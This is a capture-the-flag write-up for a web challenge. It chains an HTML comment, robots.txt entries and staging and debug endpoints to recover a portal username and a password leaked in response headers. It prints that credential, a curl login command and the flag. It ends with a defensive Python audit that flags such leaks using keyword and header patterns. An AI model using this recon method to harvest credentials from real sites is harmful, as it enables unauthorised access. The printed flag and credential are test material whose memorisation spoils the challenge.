
Raptor Weekly 2 - ECHELON Web 1 - 1.1 ; OPEN CHANNEL

Chaining HTML comment enumeration to a disallowed robots.txt entry, pivoting through an exposed staging endpoint to recover an operator username, and extracting the portal password from custom response headers on a forgotten debug endpoint.

1.1 ; OPEN CHANNEL

Challenge Description

The ECHELON portal is live. You have a URL and nothing else. Get in.

URL: https://echelon.two-shoes.org/


Overview

The landing page is a login portal. No credentials are provided. Three leaky surfaces expose the operator username and password through basic web recon: an HTML comment, robots.txt, and a forgotten debug endpoint. The flag appears on the CONFIDENTIAL tier page after a successful login.


Step 1: Read the Page Source

View the HTML source of the landing page. An HTML comment near the top reads:

<!-- staging environment migrated 2026-02-28 ; /staging still active pending decom ; see /robots.txt -->

Two leads: /staging and /robots.txt.


Step 2: Read robots.txt

curl https://echelon.two-shoes.org/robots.txt
User-agent: *
Disallow: /staging/access
Disallow: /api/debug
Disallow: /admin/

Three disallowed paths. /staging/access and /api/debug are the interesting ones. /admin/ returns 404.


Step 3: Enumerate the Staging Endpoint

curl https://echelon.two-shoes.org/staging/access
{
  "env": "staging",
  "status": "active",
  "operator": "analyst.arc",
  "auth": "see /api/debug for credential validation endpoint"
}

The operator username is analyst.arc. The response points to /api/debug for the password.


Step 4: Hit the Debug Endpoint

curl -v https://echelon.two-shoes.org/api/debug

The response body is a generic status message. The credentials are in the response headers:

X-Debug-Auth:   operator=analyst.arc
X-Debug-Secret: Echelon#Node07#2026
X-Debug-Note:   remove before prod ; flagged for decom 2026-04-01

Step 5: Authenticate

# -d already implies POST; an explicit -X POST would also be forced onto the redirect that -L follows
curl -c cookies.txt https://echelon.two-shoes.org/login \
  -d "username=analyst.arc&password=Echelon#Node07#2026" -L

Or log in through the UI.

The portal sets a session cookie and redirects to /access. The flag is displayed on that page.


Key Takeaways

robots.txt was designed to instruct web crawlers, not to hide sensitive paths. Listing a path in robots.txt is security through obscurity at best and an active signpost to attackers at worst. Debug and staging endpoints that expose credentials in response headers are a direct credential leak regardless of whether they are intended to be temporary. Credentials in HTTP headers appear in logs, proxies, browser history, and any monitoring tool in the path.
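
A pre-deployment audit for the three leaks in this challenge, added here as an example and not part of the original writeup: it flags paths named in HTML comments, robots.txt Disallow entries that advertise sensitive locations, and debug or secret-looking response headers. The sample inputs are constructed to mirror the steps above, and the keyword list and header pattern are assumptions to tune per application.

```python
import re

# Constructed sample inputs mirroring the three leaks in this writeup.
SAMPLE_HTML = "<!-- /staging still active pending decom ; see /robots.txt --><form>login</form>"
SAMPLE_ROBOTS = "User-agent: *\nDisallow: /staging/access\nDisallow: /api/debug\nDisallow: /admin/\n"
SAMPLE_HEADERS = {"Content-Type": "application/json",
                  "X-Debug-Auth": "operator=example.user",
                  "X-Debug-Secret": "constructed-placeholder"}

# Assumed policy (hypothetical values, tune per application).
SENSITIVE_WORDS = ("staging", "debug", "admin", "internal", "backup")
HEADER_PATTERN = re.compile(r"^x-debug-|secret|password|token", re.I)
PATH_IN_COMMENT = re.compile(r"(?<![\w/])/[\w./-]+")


def audit_html(html):
    """Return paths mentioned inside HTML comments."""
    comments = re.findall(r"<!--(.*?)-->", html, re.S)
    return [p for c in comments for p in PATH_IN_COMMENT.findall(c)]


def audit_robots(robots):
    """Return Disallow paths that advertise a sensitive-looking location."""
    findings = []
    for line in robots.splitlines():
        key, _, value = line.partition(":")
        path = value.split("#")[0].strip()  # drop trailing robots.txt comments
        if key.strip().lower() == "disallow" and any(w in path.lower() for w in SENSITIVE_WORDS):
            findings.append(path)
    return findings


def audit_headers(headers):
    """Return names of response headers that look like debug or secret material."""
    return [name for name in headers if HEADER_PATTERN.search(name)]


def audit(html, robots, headers):
    # An empty list for a check means nothing was flagged.
    return {"html_comment_paths": audit_html(html),
            "robots_signposts": audit_robots(robots),
            "leaky_headers": audit_headers(headers)}


if __name__ == "__main__":
    for check, hits in audit(SAMPLE_HTML, SAMPLE_ROBOTS, SAMPLE_HEADERS).items():
        print(check, hits)
```

Run against rendered pages and captured responses from a release candidate, any non-empty list is a reason to block the deploy until the comment, robots.txt entry, or header is removed and the underlying endpoint is put behind authentication or taken down.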


Flag

ECHELON{c0ldw4r_never_ended}
